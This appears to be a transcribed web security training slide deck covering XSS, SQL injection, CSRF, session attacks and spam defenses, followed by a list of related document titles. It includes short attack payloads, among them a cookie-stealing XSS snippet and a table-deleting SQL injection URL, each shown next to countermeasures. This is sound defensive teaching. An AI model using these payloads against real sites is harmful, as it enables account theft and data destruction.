Web Application Security Bootcamp. Christian Wenz
|
|
|
- Brooke Boone
- 10 years ago
- Views:
Transcription
1 Web Application Security Bootcamp Christian Wenz 0
2 Agenda 1. Why? 2. How? (well-known attacks) 3. How? (not-so-well-known attacks) 1
3 Agenda 1. Why? 2. How? (well-known attacks) 3. How? (not-so-well-known attacks) 2
4 Web Security Western European revenue for the security software market reached almost $2.5 billion in [IDC04] Large amounts of money are spent to fight spyware, malware, DDoS, but... 3
5 The Problem Lazy programmers are much more effective Mostly independent on the technology used! The "Outlaw group" fine-tuned a page on Microsoft.com with a really common attack (ww.microsoft.com/spress/uk) This happened less than a year ago (May 2004) [ZoneH04] 4
6 Further Victims T-Com: A lot of bugs [Heise04a] TV expert Huth [Heise04b] Various OSS, including Gallery, PhpBB, PostNuke, Serendipity, phpmyadmin,... 5
7 Are PHP/Python/Perl/ insecure? That depends Most of the following weaknesses do not depend on the software. So the problem is *not* PHP/ASP.NET/..., but the self-proclaimed great programmer classical PEBKAC 6
8 OWASP Known Weaknesses The Open Web Application Security Project 2004 Top Ten List [OWASP04]: 1. [Lazy Programmer] 2. [Lazy Programmer] 9. DoS 10. Configuration issues 7
9 What to do? Our Goal That's simple: No lazy programming Well dumb questions deserve dumb answers A better approach: Learn to think how the enemy thinks. 8
10 Structure of this talk First: Bad code Second: Exploiting the bad code Third: Countermeasures No website is 100% secure, but getting to know the enemy is the first step towards that. 9
11 Agenda 1. Why? 2. How? (well-known attacks) 3. How? (not-so-well-known attacks) 10
12 Unchecked Input Problem: User input is not validated Scenario: Guestbook. Users enter Text ein, which is sent to the client verbatim Attacks: HTML markup Very long words 11
13 Unchecked Input (2) Countermeasures: All Input Is Evil. [Howard] Validate *all* input Your webserver is the safe zone, everyhing else is the unsafe zone. Everything that crosses the border must be checked Use htmlspecialchars() before sending dynamic content to the browser 12
14 Do we have a problem? Conference tool if (user_is_authenticated()) { show_edit_form($_get['id']); } 13
15 Cross Site Request Forgeries Problem: Our URLs tell for themselves, so no additional authentication necessary. Scenario: Newsboard with role system. A user only sees the admin links that relate to his role Attack: Create URLs manually 14
16 Cross Site Request Forgeries (2) Countermeasures: Avoid parameters, if possible Might be better for Google & Friends. Try to use sessions for data Expect the worst case: All data is manipulated Check authorization Sanity checks 15
17 PaFileDB Do we have a problem?... function jumpmenu($db, $pageurl,$pafiledb_sql,$str) { echo("<form name=\"form1\"> <select name=\"menu1\" onchange=\"mm_jumpmenu('parent',this,0)\" class=\"forminput\"> <option value=\"$pageurl\" selected>$str[jump]</option> <option value=\"$pageurl\"> </option>"); 16
18 XSS (Cross Site Scripting) Problem: (Dangerous) script code is embedded into the output of a serverside script. Is then executed in the context of the page Scenario: Guestbook, again Attacks: location.replace(" (new Image()).src=" + escape(document.cookie); 17
19 XSS (Cross Site Scripting) (2) Countermeasures: Same procedure as every year: Validate, validate, validate... Validate data htmlspecialchars() Further/special checks for addresses, numeric values,... 18
20 XSS (Cross Site Scripting) (3) Why does XSS still exist? User Experience vs. Security Not all HTML shall be filtered However most approaches are flawed. Filter <script... Filter javascript: BBCode Any other ideas? 19
21 Do we have a problem? phpbb $sql = "SELECT * FROM ". NOTES_TABLE. "WHERE post_id = ".$post_id. "AND poster_id = ". $userdata['user_id']. " "; if (!$result = $db->sql_query($sql)) {... } 20
22 SQL Injection Problem: User input is embedded into SQL queries Scenario: CMS (Content Management System). The ID of an entry is passed in the URL: $sql = "SELECT * FROM news WHERE id=". $_GET["id"] Attacks: xyz.php?id=1%27%3bdelete+*+from+news 21
23 SQL Injection (2) Counter measures: Once aagain: Validate all data Filter special characters (', [, ], %, _, ) Use parametrised queries (depending on the database extension used) Stored Procedures SPs do not make the number of potential mistakes smaller, but only the number of potential programmers that could mess it up. 22
24 SQL Injection (3) Escaping special character Depends on the database system Sometimes, a backslash will do INSERT INTO fastfood (name, mascot) VALUES ('McDonald\'s', 'Ronald') Sometimes doubling the quotes will do INSERT INTO fastfood (name, mascot) VALUES ('McDonald''s', 'Ronald') 23
25 SQL Injection (5) Prepared statements Faster More secure PHP Example: $stmt = mysqli_prepare($db, 'INSERT INTO fastfood (name, mascot) VALUES (?,?)'); mysqli_stmt_bind_param($stmt, 'ss', $mcd, $ronald); mysqli_stmt_execute($stmt); 24
26 Do we have a problem? Jack's FormMail.php if (file_exists($ar_file)) { $fd = fopen($ar_file, "rb"); $ar_message = fread($fd, filesize($ar_file)); fclose($fd); mail_it($ar_message, ($ar_subject)?stripslashes($ar_subject): "RE: Form Submission", ($ar_from)?$ar_from:$recipient, $ ); } PHProjekt include_once("$lib_path/access_form.inc.php"); 25
27 File System Vulnerabilities Problem: User input is part of a filename that will be used Scenario: CMS (Content Management System). The name of the template is passed via URL: include $_GET['template']. '.tmpl'; Attacks: cms.php?template= 26
28 File System Vulnerabilities (2) Countermeasures: Sanitize file names 27
29 Agenda 1. Why? 2. How? (well-known attacks) 3. How? (not-so-well-known attacks) 28
30 Session Fixation Problem: A Session is created and then sent to a user Scenario: Websites that protect sensitive data via sessions, e.g. Webmail Attack: xyz.php?phpsessid=abc
31 Countermeasures: Session Fixation (2) If possible, change session ID (in PHP: session_regenerate_id()) when A session is initialized When a user is about to log in Creates a new, real Session-ID 30
32 Session Hijacking Problem: The session of the victim is hijacked Scenario: As before, e.g. Webmail Attacks: Send me the link, please Send the link, then look up HTTP_REFERER Guess (promising only when combined with session fixation) 31
33 Countermeasures: Session Hijacking (2) Many approaches, none is optimal Tie session to IP address Use data from HTTP header for authentication Set a session timeout. Require extra login before risky operations (like ordering) 32
34 Forged cookies Problem: Cookies are more secure than sessions, because the latter can be forged not true. Cookies are sent as a part of the HTTP header, so they are (relatively) easy to forge Scenario: Website authenticates users, saves this information in a Cookie Attack: Forge cookie (if value is static or easy to guess) 33
35 Forged cookies (2) Countermeasures: Encrypt data in cookies Never send unencrypted, simple data in cookies( loggedin=true very bad idea) User dynamic data in cookies verwenden (e.g. session ID), never a static value 34
36 Mail scripts Problem: Mail scripts are abused to send spam. Scenario: Feedback form Attacks: Recipient's address in a hidden form field is not hidden at all. Potential DoS by repeatedly calling the script. 35
37 Mail scripts (2) Countermeasures: Only humans may send the form Never accept recipient's addresses from the client (or: use a whitelist) CAPTCHAs (Turing tests) against automatic form submission [vonahn03] Solve accessibility issues with other means, for instance with audio CAPTCHAs 36
38 New problem: HTTP Response Splitting What s wrong with this code? print "Location: $url"; An attacker could include CR/LF in the request Therefore, additional headers can be set Including Cookie: name=value Many server-side technologies ignore everything after \r\n 37 37
39 New solution: Get rid of CR/LF! Try to split the input on \n or \r\n, then only use the first line Or: Just replace LF by something else Especially important if you write the HTTP headers yourself, without the help of the server-side technology 38 38
40 New problem: XPath Injection Problem: Custom commands get embedded into an XPath query Very dangerous if this XPath query is used to authenticate users Again, blind injection attacks possible 39 39
41 New solution: Filter/escape Check the data embedded into the query Dangerous characters: ', " The more complex a technology gets, the easier it is to overlook something 40 40
42 New Problem: RegEx Injection Problem: e modifier in regular expressions Extremely dangerous if user-supplied data is embedded in this regular expression Arbitrary code execution may be necessary Whitepaper: RegExInjection.pdf 41 41
43 New Solution: Validate/Escape Check the data embedded into the query Dangerous characters: $, ', " Try to avoid the e modifier 42 42
44 New problem: Trackback spamming Problem: Spammers create trackbacks to weblogs to get their URL mentioned and therefore increasing their Google PageRank Trackback API is very simple POST Content-type: application/x-www-form-urlencoded title=buy+stuff&url= =Buy+my+stuff&blog_name=Spamblog 43 43
45 New solution: Trace trackbacks Ban/block IPs Use a dynamic blacklist of IPs/URLs Create list of bad words Rename trackback script and disable autodiscovery Close trackbacks for older entries 44 44
46 New problem: Comment spamming Problem: Spammers (automatically) post comments to weblogs to get their URL mentioned and therefore increasing their Google PageRank Also works with feedback forms and send-a-friend features of websites 45 45
47 New solution: Check comments Block IP addresses Moderate comments Close older entries for comments Rename comment script URL Check HTTP_REFERER 46 46
48 CAPTCHAs Completely Automated Turing Test to Tell Computers and Humans Apart Turing test: Is there a man or a machine at the other end of the wire. Is used more and more in the web. Yahoo! was one of the early adaptors 47
49 Graphical CAPTCHAs Important rule: Source code is open Most of the time, a graphic with some characters on it How? DIY (GD2,...) Use existing solutions 48
50 Screen Scraping Problem: Website is loaded with wget and then processed [HauWe01] Scenario: Current list of the least expensive gas stations Attack: wget + RegEx 49
51 Screen Scraping (2) Countermeasures: Validate human beings :-) CAPTCHAs, again However horny users are an effective helper for attackers to overcome this. 50
52 Crack CAPTCHAs What six letter word is worse than bad and lazy programmers? Libido 51
53 Conclusion The problem is always the same evil input is not sanitized, validated or fixed The entry points of the data varies between attack types Better paranoid than offline 52
54 Sources [IDC04] IDC-Press Release ( 4_04_22_210409) [HauWe01] Hauser, Wenz in c t (17/2001), S [Heise04a] [Heise04b] [Howard03] Howard, LeBlanc, Writing Secure Code, 2nd Edition, MS Press
55 Sources (2) [OWASP04] OWASP. The Open Web Application Security Project. [vonahn03] von Ahn, Blum, Hopper and Langford. CAPTCHA: Using Hard AI Problems for Security. Eurocrypt [ZoneH04] MS Defacement ( 54
56 Thank You! Questions?
Intrusion detection for web applications
Intrusion detection for web applications Intrusion detection for web applications Łukasz Pilorz Application Security Team, Allegro.pl Reasons for using IDS solutions known weaknesses and vulnerabilities
Web-Application Security
Web-Application Security Kristian Beilke Arbeitsgruppe Sichere Identität Fachbereich Mathematik und Informatik Freie Universität Berlin 29. Juni 2011 Overview Web Applications SQL Injection XSS Bad Practice
Check list for web developers
Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation
Web Application Hacking (Penetration Testing) 5-day Hands-On Course
Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Course Description Our web sites are under attack on a daily basis
Magento Security and Vulnerabilities. Roman Stepanov
Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection
Ruby on Rails Secure Coding Recommendations
Introduction Altius IT s list of Ruby on Rails Secure Coding Recommendations is based upon security best practices. This list may not be complete and Altius IT recommends this list be augmented with additional
Where every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
Web application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
Cross Site Scripting in Joomla Acajoom Component
Whitepaper Cross Site Scripting in Joomla Acajoom Component Vandan Joshi December 2011 TABLE OF CONTENTS Abstract... 3 Introduction... 3 A Likely Scenario... 5 The Exploit... 9 The Impact... 12 Recommended
Security Testing with Selenium
with Selenium Vidar Kongsli Montréal, October 25th, 2007 Versjon 1.0 Page 1 whois 127.0.0.1? Vidar Kongsli System architect & developer Head of security group Bekk Consulting Technology and Management
What is Web Security? Motivation
[email protected] http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
ASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus
ASP.NET MVC Secure Coding 4-Day hands on Course Course Syllabus Course description ASP.NET MVC Secure Coding 4-Day hands on Course Secure programming is the best defense against hackers. This multilayered
Criteria for web application security check. Version 2015.1
Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-
Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh
Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP
Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers
Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers The Website can be developed under Windows or Linux Platform. Windows Development should be use: ASP, ASP.NET 1.1/ 2.0, and
(WAPT) Web Application Penetration Testing
(WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:
Application Security Testing. Generic Test Strategy
Application Security Testing Generic Test Strategy Page 2 of 8 Contents 1 Introduction 3 1.1 Purpose: 3 1.2 Application Security Testing: 3 2 Audience 3 3 Test Strategy guidelines 3 3.1 Authentication
FINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
Last update: February 23, 2004
Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to
State of The Art: Automated Black Box Web Application Vulnerability Testing. Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell
Stanford Computer Security Lab State of The Art: Automated Black Box Web Application Vulnerability Testing, Elie Bursztein, Divij Gupta, John Mitchell Background Web Application Vulnerability Protection
Testing the OWASP Top 10 Security Issues
Testing the OWASP Top 10 Security Issues Andy Tinkham & Zach Bergman, Magenic Technologies Contact Us 1600 Utica Avenue South, Suite 800 St. Louis Park, MN 55416 1 (877)-277-1044 [email protected] Who Are
Enterprise Application Security Workshop Series
Enterprise Application Security Workshop Series Phone 877-697-2434 fax 877-697-2434 www.thesagegrp.com Defending JAVA Applications (3 Days) In The Sage Group s Defending JAVA Applications workshop, participants
ASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION
ASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION V 2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: Learn the various attacks like sql injections, cross site scripting, command execution
Web Application Security Considerations
Web Application Security Considerations Eric Peele, Kevin Gainey International Field Directors & Technology Conference 2006 May 21 24, 2006 RTI International is a trade name of Research Triangle Institute
Advanced Web Technology 10) XSS, CSRF and SQL Injection 2
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 Table of Contents Cross Site Request Forgery - CSRF Presentation
Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure
Vulnerabilities, Weakness and Countermeasures Massimo Cotelli CISSP Secure : Goal of This Talk Security awareness purpose Know the Web Application vulnerabilities Understand the impacts and consequences
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
Web Application Security
Web Application Security John Zaharopoulos ITS - Security 10/9/2012 1 Web App Security Trends Web 2.0 Dynamic Webpages Growth of Ajax / Client side Javascript Hardening of OSes Secure by default Auto-patching
Application security testing: Protecting your application and data
E-Book Application security testing: Protecting your application and data Application security testing is critical in ensuring your data and application is safe from security attack. This ebook offers
Chapter 1 Web Application (In)security 1
Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is
Still Aren't Doing. Frank Kim
Ten Things Web Developers Still Aren't Doing Frank Kim Think Security Consulting Background Frank Kim Consultant, Think Security Consulting Security in the SDLC SANS Author & Instructor DEV541 Secure Coding
The Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions [email protected] Agenda Current State of Web Application Security Understanding
Webapps Vulnerability Report
Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during
Recon and Mapping Tools and Exploitation Tools in SamuraiWTF Report section Nick Robbins
Recon and Mapping Tools and Exploitation Tools in SamuraiWTF Report section Nick Robbins During initial stages of penetration testing it is essential to build a strong information foundation before you
3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) [email protected] Open Web Application Security Project http://www.owasp.org
OWASP TOP 10 ILIA ALSHANETSKY @ILIAA HTTPS://JOIND.IN/15741
OWASP TOP 10 ILIA ALSHANETSKY @ILIAA HTTPS://JOIND.IN/15741 ME, MYSELF & I PHP Core Developer Author of Guide to PHP Security Security Aficionado THE CONUNDRUM USABILITY SECURITY YOU CAN HAVE ONE ;-) OPEN
External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek ([email protected])
Bug Report Date: March 19, 2011 Reporter: Chris Jarabek ([email protected]) Software: Kimai Version: 0.9.1.1205 Website: http://www.kimai.org Description: Kimai is a web based time-tracking application.
Project 2: Web Security Pitfalls
EECS 388 September 19, 2014 Intro to Computer Security Project 2: Web Security Pitfalls Project 2: Web Security Pitfalls This project is due on Thursday, October 9 at 6 p.m. and counts for 8% of your course
Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008
Detecting Web Application Vulnerabilities Using Open Source Means OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008 Kostas Papapanagiotou Committee Member OWASP Greek Chapter [email protected]
Network Security Exercise #8
Computer and Communication Systems Lehrstuhl für Technische Informatik Network Security Exercise #8 Falko Dressler and Christoph Sommer Computer and Communication Systems Institute of Computer Science,
SECURITY ADVISORY. December 2008 Barracuda Load Balancer admin login Cross-site Scripting
SECURITY ADVISORY December 2008 Barracuda Load Balancer admin login Cross-site Scripting Discovered in December 2008 by FortConsult s Security Research Team/Jan Skovgren WARNING NOT FOR DISCLOSURE BEFORE
National Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research
National Information Security Group The Top Web Application Hack Attacks Danny Allan Director, Security Research 1 Agenda Web Application Security Background What are the Top 10 Web Application Attacks?
Web Application Security Assessment and Vulnerability Mitigation Tests
White paper BMC Remedy Action Request System 7.6.04 Web Application Security Assessment and Vulnerability Mitigation Tests January 2011 www.bmc.com Contacting BMC Software You can access the BMC Software
Security features of ZK Framework
1 Security features of ZK Framework This document provides a brief overview of security concerns related to JavaScript powered enterprise web application in general and how ZK built-in features secures
EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke
EVALUATING COMMERCIAL WEB APPLICATION SECURITY By Aaron Parke Outline Project background What and why? Targeted sites Testing process Burp s findings Technical talk My findings and thoughts Questions Project
Lecture 11 Web Application Security (part 1)
Lecture 11 Web Application Security (part 1) Computer and Network Security 4th of January 2016 Computer Science and Engineering Department CSE Dep, ACS, UPB Lecture 11, Web Application Security (part 1)
Hacking de aplicaciones Web
HACKING SCHOOL Hacking de aplicaciones Web Gabriel Maciá Fernández Fundamentos de la web CLIENTE SERVIDOR BROWSER HTTP WEB SERVER DATOS PRIVADOS BASE DE DATOS 1 Interacción con servidores web URLs http://gmacia:[email protected]:80/descarga.php?file=prueba.txt
Finding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft
Finding and Preventing Cross- Site Request Forgery Tom Gallagher Security Test Lead, Microsoft Agenda Quick reminder of how HTML forms work How cross-site request forgery (CSRF) attack works Obstacles
Annual Web Application Security Report 2011
Annual Web Application Security Report 2011 An analysis of vulnerabilities found in external Web Application Security tests conducted by NTA Monitor during 2010 Contents 1.0 Introduction... 3 2.0 Summary...
Security vulnerabilities in new web applications. Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant
Security vulnerabilities in new web applications Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant $whoami Introduction Pavol Lupták 10+ years of practical experience in security and seeking vulnerabilities
Web Application Security
Web Application Security Security Mitigations Halito 26 juni 2014 Content Content... 2 Scope of this document... 3 OWASP Top 10... 4 A1 - Injection... 4... 4... 4 A2 - Broken Authentication and Session
Columbia University Web Security Standards and Practices. Objective and Scope
Columbia University Web Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Security Standards and Practices document establishes a baseline of security related requirements
WEB ATTACKS AND COUNTERMEASURES
WEB ATTACKS AND COUNTERMEASURES February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in
JOOMLA SECURITY. ireland website design. by Oliver Hummel. ADDRESS Unit 12D, Six Cross Roads Business Park, Waterford City
JOOMLA SECURITY by Oliver Hummel ADDRESS Unit 12D, Six Cross Roads Business Park, Waterford City CONTACT Nicholas Butler 051-393524 089-4278112 [email protected] Contents Introduction 3 Installation
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework [email protected] keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities Thomas Moyer Spring 2010 1 Web Applications What has changed with web applications? Traditional applications
Hack Proof Your Webapps
Hack Proof Your Webapps About ERM About the speaker Web Application Security Expert Enterprise Risk Management, Inc. Background Web Development and System Administration Florida International University
WebCruiser Web Vulnerability Scanner User Guide
WebCruiser Web Vulnerability Scanner User Guide Content 1. Software Introduction...2 2. Key Features...3 2.1. POST Data Resend...3 2.2. Vulnerability Scanner...6 2.3. SQL Injection...8 2.3.1. POST SQL
Web Application Attacks and Countermeasures: Case Studies from Financial Systems
Web Application Attacks and Countermeasures: Case Studies from Financial Systems Dr. Michael Liu, CISSP, Senior Application Security Consultant, HSBC Inc Overview Information Security Briefing Web Applications
Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH [email protected] January 17, 2014 2014 Mega Conference
Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH [email protected] January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance
How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3
Table of Contents Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3 Information Gathering... 3 Vulnerability Testing... 7 OWASP TOP 10 Vulnerabilities:... 8 Injection
Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks. Whitepaper
Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks Whitepaper The security industry has extensively focused on protecting against malicious injection attacks like
Web Application Guidelines
Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security
Perl In Secure Web Development
Perl In Secure Web Development Jonathan Worthington ([email protected]) August 31, 2005 Perl is used extensively today to build server side web applications. Using the vast array of modules on CPAN, one
How To Understand The History Of The Web (Web)
(World Wide) Web WWW A way to connect computers that provide information (servers) with computers that ask for it (clients like you and me) uses the Internet, but it's not the same as the Internet URL
HTTPParameter Pollution. ChrysostomosDaniel
HTTPParameter Pollution ChrysostomosDaniel Introduction Nowadays, many components from web applications are commonly run on the user s computer (such as Javascript), and not just on the application s provider
Lecture 15 - Web Security
CSE497b Introduction to Computer and Network Security - Spring 2007 - Professor Jaeger Lecture 15 - Web Security CSE497b - Spring 2007 Introduction Computer and Network Security Professor Jaeger www.cse.psu.edu/~tjaeger/cse497b-s07/
Sitefinity Security and Best Practices
Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management
Architectural Design Patterns. Design and Use Cases for OWASP. Wei Zhang & Marco Morana OWASP Cincinnati, U.S.A. http://www.owasp.
Architectural Design Patterns for SSO (Single Sign On) Design and Use Cases for Financial i Web Applications Wei Zhang & Marco Morana OWASP Cincinnati, U.S.A. OWASP Copyright The OWASP Foundation Permission
Web Security Testing Cookbook*
Web Security Testing Cookbook* Systematic Techniques to Find Problems Fast Paco Hope and Ben Walther O'REILLY' Beijing Cambridge Farnham Koln Sebastopol Tokyo Table of Contents Foreword Preface xiii xv
Common Security Vulnerabilities in Online Payment Systems
Common Security Vulnerabilities in Online Payment Systems Author- Hitesh Malviya(Information Security analyst) Qualifications: C!EH, EC!SA, MCITP, CCNA, MCP Current Position: CEO at HCF Infosec Limited
Securing your Web application
Securing your Web application TI1506: Web and Database Technology Claudia Hauff! Lecture 8 [Web], 2014/15 1 Course overview [Web] 1. http: the language of Web communication 2. Web (app) design & HTML5
STOPPING LAYER 7 ATTACKS with F5 ASM. Sven Müller Security Solution Architect
STOPPING LAYER 7 ATTACKS with F5 ASM Sven Müller Security Solution Architect Agenda Who is targeted How do Layer 7 attacks look like How to protect against Layer 7 attacks Building a security policy Layer
Penetration Test Report
Penetration Test Report Acme Test Company ACMEIT System 26 th November 2010 Executive Summary Info-Assure Ltd was engaged by Acme Test Company to perform an IT Health Check (ITHC) on the ACMEIT System
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
DOS ATTACKS USING SQL WILDCARDS
DOS ATTACKS USING SQL WILDCARDS Ferruh Mavituna www.portcullis-security.com This paper discusses abusing Microsoft SQL Query wildcards to consume CPU in database servers. This can be achieved using only
Rational AppScan & Ounce Products
IBM Software Group Rational AppScan & Ounce Products Presenters Tony Sisson and Frank Sassano 2007 IBM Corporation IBM Software Group The Alarming Truth CheckFree warns 5 million customers after hack http://infosecurity.us/?p=5168
Sichere Software- Entwicklung für Java Entwickler
Sichere Software- Entwicklung für Java Entwickler Dominik Schadow Senior Consultant Trivadis GmbH 05/09/2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART
WEB APPLICATION SECURITY
WEB APPLICATION SECURITY February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in part
Essential IT Security Testing
Essential IT Security Testing Application Security Testing for System Testers By Andrew Muller Director of Ionize Who is this guy? IT Security consultant to the stars Member of OWASP Member of IT-012-04
ASL IT Security Advanced Web Exploitation Kung Fu V2.0
ASL IT Security Advanced Web Exploitation Kung Fu V2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: There is a lot more in modern day web exploitation than the good old alert( xss ) and union
2010: and still bruteforcing
2010: and still bruteforcing OWASP Webslayer Christian Martorella July 18th 2010 Barcelona Who am I Manager Auditoria CISSP, CISA, CISM, OPST, OPSA,CEH OWASP WebSlayer Project Leader FIST Conference, Presidente
CS 161 Computer Security
Paxson Spring 2013 CS 161 Computer Security Homework 2 Due: Wednesday, March 6, at 10PM Version 1.1 (02Mar13) Instructions. This assignment must be done on your own, and in accordance with the course policies
Web Application Penetration Testing
Web Application Penetration Testing 2010 2010 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property. Will Bechtel [email protected]
Nuclear Regulatory Commission Computer Security Office Computer Security Standard
Nuclear Regulatory Commission Computer Security Office Computer Security Standard Office Instruction: Office Instruction Title: CSO-STD-1108 Web Application Standard Revision Number: 1.0 Effective Date:
Web Security Threat Report: January April 2007. Ryan C. Barnett WASC Member Project Lead: Distributed Open Proxy Honeypots
Web Security Threat Report: January April 2007 Ryan C. Barnett WASC Member Project Lead: Distributed Open Proxy Honeypots What are we reporting? We are presenting real, live web attack data captured in-the-wild.
Kentico CMS security facts
Kentico CMS security facts ELSE 1 www.kentico.com Preface The document provides the reader an overview of how security is handled by Kentico CMS. It does not give a full list of all possibilities in the
Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
Client logo placeholder XXX REPORT. Page 1 of 37
Client logo placeholder XXX REPORT Page 1 of 37 Report Details Title Xxx Penetration Testing Report Version V1.0 Author Tester(s) Approved by Client Classification Confidential Recipient Name Title Company
